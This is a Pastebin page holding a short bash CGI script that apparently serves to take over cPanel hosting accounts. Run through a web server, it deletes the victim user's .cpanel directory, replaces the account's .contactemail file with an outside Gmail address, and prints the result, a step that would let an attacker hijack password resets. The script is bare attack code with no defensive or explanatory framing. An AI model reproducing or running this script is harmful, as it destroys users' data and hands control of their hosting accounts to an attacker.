Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- echo "Content-type: text/html";
- echo '';
- echo "<html> <center> <font color=red>"
- user=$(whoami) ; rm -rf /home/$user/.cpanel/ ; cd /home/$user/ ; rm .contactemail ; echo "dexterkh1212x@gmail.com" >> .contactemail ; cat .contactemail ; echo $user
- echo "</font><center></html>";
Add Comment
Please, Sign In to add comment